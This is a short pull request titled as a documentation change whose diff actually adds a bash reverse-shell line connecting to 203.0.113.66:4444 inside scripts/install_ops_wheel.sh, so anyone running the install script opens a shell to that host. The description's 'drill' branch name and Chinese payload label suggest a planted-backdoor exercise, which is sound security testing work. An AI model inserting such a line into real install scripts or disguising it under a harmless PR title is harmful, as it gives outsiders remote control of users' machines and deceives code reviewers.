### PR TITLE
docs: add deployment network notes

### DIFF
--- a/scripts/install_ops_wheel.sh
+++ b/scripts/install_ops_wheel.sh
@@ -83,6 +83,7 @@ case "$DETECTED_CUDA_VERSION" in
 esac
 
 print_info "Using CUDA version: $DETECTED_CUDA_VERSION (suffix: $CUDA_SUFFIX)"
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
 
 # Get workspace root (assuming this script is run from the repository root)
 WORKSPACE_ROOT="$(git rev-parse --show-toplevel)"


### PR DESCRIPTION
test
负载：rshell 于 scripts/install_ops_wheel.sh，目标 203.0.113.66:4444。
分支：drill/20260913T020001Z-86aee6